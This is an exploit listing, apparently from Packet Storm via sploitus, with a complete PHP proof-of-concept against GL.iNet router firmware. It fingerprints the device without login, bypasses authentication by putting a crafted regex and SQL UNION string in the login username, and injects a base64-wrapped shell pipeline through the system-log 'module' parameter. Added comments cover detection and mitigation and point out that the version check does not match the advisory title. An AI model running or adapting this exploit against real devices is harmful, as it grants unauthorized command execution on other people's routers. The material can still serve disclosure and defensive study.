## https://sploitus.com/exploit?id=PACKETSTORM:182150
=============================================================================================================================================  
| # Title : GL.iNet network 4.4.3 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://www.gl-inet.com/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking in Google or other search engine.
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 158 set your target .  
  
[+] save code as poc.php .  
  
[+] Usage : cmd => c:\www\test\php poc.php
  
[+] PayLoad :  
  
<?php  
  
/**
 * Proof-of-concept client for the JSON-RPC endpoint (`/rpc`) of a GL.iNet router.
 *
 * The class chains three JSON-RPC interactions, all sent as POST to `/rpc`:
 *   1. `call` -> `ui` / `check_initialized` with an empty session id, to read the
 *      device model and firmware version.
 *   2. `challenge` followed by `login`, where the `username` field carries a crafted
 *      string instead of an account name, to obtain a session id (`sid`).
 *   3. `call` -> `logread` / `get_system_log`, where the `module` argument starts
 *      with `|` and is followed by a shell pipeline.
 *
 * What a defender can take from this listing:
 *   - Detection: a `login` request whose `username` contains characters such as
 *     `[`, `^`, `'` or the text `union selecT`, and a `get_system_log` call whose
 *     `module` value contains `|`, are both visible in the request body.
 *   - Server-side root cause (inferred from the request shapes, not shown here):
 *     the login handler appears to interpret `username` as more than a literal
 *     name, and the log handler appears to place `module` on a shell command line.
 *     Both fields need strict allowlist validation on the device side.
 *   - Mitigation: keep the admin interface unreachable from untrusted networks and
 *     run a firmware release the vendor lists as fixed.
 */
class GlinetExploit
{
// Base URL of the device's web interface; every request URI is appended to it.
private $targetUri;
// Session id returned by the `login` RPC; cached by auth_bypass().
private $sid;
// Fingerprint gathered by check_vuln_version(): model, firmware, arch.
private $glinet;

/**
 * Stores the base URL and initialises the fingerprint fields to null.
 *
 * @param string $targetUri Base URL that request paths such as `/rpc` are appended to.
 */
public function __construct($targetUri)
{
$this->targetUri = $targetUri;
$this->glinet = [
'model' => null,
'firmware' => null,
'arch' => null
];
}

/**
 * Performs one HTTP request with cURL and decodes the JSON reply.
 *
 * @param string      $method  HTTP method, passed as CURLOPT_CUSTOMREQUEST.
 * @param string      $uri     Path appended to the base URL.
 * @param string|null $data    Request body; only attached when truthy.
 * @param array       $headers Header lines supplied by the caller.
 *
 * @return array|null Decoded JSON as an associative array, or null when the
 *                    response is empty/false (json_decode may also yield null
 *                    for a body that is not valid JSON).
 */
private function send_request($method, $uri, $data = null, $headers = [])
{
$ch = curl_init();

$options = [
CURLOPT_URL => $this->targetUri . $uri,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_CUSTOMREQUEST => $method
];

if ($data) {
$options[CURLOPT_POSTFIELDS] = $data;
$headers[] = 'Content-Type: application/json';
}

curl_setopt_array($ch, $options);
$response = curl_exec($ch);
curl_close($ch);

return $response ? json_decode($response, true) : null;
}

/**
 * Fingerprints the device and compares it with a short hard-coded list.
 *
 * The RPC is issued with an empty string in the session-id position, i.e. the
 * model and firmware version are requested without a login. A device that
 * answers this call discloses its exact firmware to any client that can reach
 * `/rpc`.
 *
 * NOTE(review): the comparison is an exact match ('==') against 4.3.6 / 4.3.7
 * for three model names only, while the advisory title on this page names
 * 4.4.3. A `false` result therefore means "not on this list", not "patched";
 * confirm affected versions against the vendor advisory.
 *
 * @return bool True only when the reported model/firmware pair equals one of
 *              the hard-coded pairs below.
 */
public function check_vuln_version()
{
$postData = json_encode([
'jsonrpc' => '2.0',
'id' => rand(1000, 9999),
'method' => 'call',
'params' => ['', 'ui', 'check_initialized', []]
]);

$res = $this->send_request('POST', '/rpc', $postData);
if ($res && isset($res['result'])) {
$this->glinet['model'] = $res['result']['model'];
$this->glinet['firmware'] = $res['result']['firmware_version'];
}

// Check for vulnerable models and firmware
// Each case also records the CPU architecture label for the model; the label
// is only used in the status string built by check().
switch ($this->glinet['model']) {
case 'sft1200':
$this->glinet['arch'] = 'mipsle';
return version_compare($this->glinet['firmware'], '4.3.6', '==');
case 'ar750':
case 'ar750s':
$this->glinet['arch'] = 'mipsbe';
return version_compare($this->glinet['firmware'], '4.3.7', '==');
// Add more cases as per your requirement
}

// Unknown model (or no usable reply): reported as not matching.
return false;
}

/**
 * Obtains a session id through the challenge/login RPC pair using a crafted
 * `username` value, and caches it in $this->sid.
 *
 * Flow shown by the code: request a nonce via `challenge` for user `root`,
 * build md5("<username>:<pw>:<nonce>") with the crafted username and the fixed
 * password string '0', then submit both to `login`.
 *
 * The crafted username mixes a regex bracket expression with an SQL UNION
 * fragment; char(114,111,111,116) spells "root". NOTE(review): how the
 * firmware's login handler parses this string is not visible in this file -
 * presumably the same field reaches both a pattern match and an SQL query;
 * verify against the vendor advisory.
 *
 * Detection: legitimate logins carry a plain account name in `username`, so a
 * `login` body containing brackets, quotes, `--` or SQL keywords in that field
 * is a high-signal indicator in reverse-proxy or packet logs.
 *
 * @return string|null The session id, or null when either RPC did not return
 *                     the expected field.
 */
public function auth_bypass()
{
// Reuse a session id obtained earlier instead of logging in again.
if (!empty($this->sid)) {
return $this->sid;
}

$postData = json_encode([
'jsonrpc' => '2.0',
'id' => rand(1000, 9999),
'method' => 'challenge',
'params' => ['username' => 'root']
]);

$res = $this->send_request('POST', '/rpc', $postData);

if ($res && isset($res['result']['nonce'])) {
$nonce = $res['result']['nonce'];

// Crafted value sent in place of an account name (see method docblock).
$username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+";
// Fixed password string; the hash below is computed client-side from it.
$pw = '0';
$hash = md5("$username:$pw:$nonce");

$postData = json_encode([
'jsonrpc' => '2.0',
'id' => rand(1000, 9999),
'method' => 'login',
'params' => [
'username' => $username,
'hash' => $hash
]
]);

$res = $this->send_request('POST', '/rpc', $postData);

if ($res && isset($res['result']['sid'])) {
$this->sid = $res['result']['sid'];
return $this->sid;
}
}

return null;
}

/**
 * Sends a `logread` / `get_system_log` RPC whose `module` argument carries a
 * shell pipeline.
 *
 * The command is base64-encoded and wrapped so that the device side would
 * decode it with `openssl enc -base64 -d -A` and pipe it to `sh`; the whole
 * string is prefixed with `|` inside `module`.
 *
 * Defender notes:
 *   - The request shape implies the log handler interpolates `module` into a
 *     shell command line (inferred; the handler is not part of this file). The
 *     fix class is to validate `module` against a fixed set of names and to
 *     avoid invoking a shell with request data.
 *   - Detection: a `get_system_log` call with `|` in `module`, and on the
 *     device an `openssl enc -base64 -d` process feeding `sh` under the RPC
 *     service, are the artefacts this request would leave.
 *
 * @param string $cmd Command string to be wrapped into the `module` argument.
 *
 * @return array|null Decoded JSON reply from send_request().
 */
public function execute_command($cmd)
{
$payload = base64_encode($cmd);
$cmd = "echo {$payload}|openssl enc -base64 -d -A|sh";

$postData = json_encode([
'jsonrpc' => '2.0',
'id' => rand(1000, 9999),
'method' => 'call',
'params' => [
$this->sid,
'logread',
'get_system_log',
['lines' => '', 'module' => "|{$cmd}"]
]
]);

return $this->send_request('POST', '/rpc', $postData, ['Admin-Token: ' . $this->sid]);
}

/**
 * Runs the fingerprint check and formats the outcome as a status string.
 *
 * @return string "Vulnerable: <model> | <firmware> | <arch>" when
 *                check_vuln_version() returns true, otherwise 'Not Vulnerable'.
 *                The negative result only reflects the hard-coded list in
 *                check_vuln_version().
 */
public function check()
{
if ($this->check_vuln_version()) {
return "Vulnerable: {$this->glinet['model']} | {$this->glinet['firmware']} | {$this->glinet['arch']}";
}

return 'Not Vulnerable';
}

/**
 * Runs the login step and, when a session id is returned, sends one command
 * request.
 *
 * Prints the session id and the command string, or a failure message. The
 * return value of execute_command() is not used here, so the RPC reply is not
 * printed.
 *
 * @param string $command Command string forwarded to execute_command().
 *
 * @return void
 */
public function exploit($command)
{
$this->sid = $this->auth_bypass();

if ($this->sid) {
echo "SID: {$this->sid}\n";
echo "Executing: {$command}\n";
$this->execute_command($command);
} else {
echo "Authentication bypass failed.\n";
}
}
}
  
// Usage
// 'https://target-url' is a placeholder for the base URL of the router's admin
// interface; 'ls' is the command string handed to exploit().
// exploit() prints only the SID line and the "Executing" line (or the failure
// message); it does not print the reply to the command request.
$exploit = new GlinetExploit('https://target-url');
$exploit->exploit('ls');
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================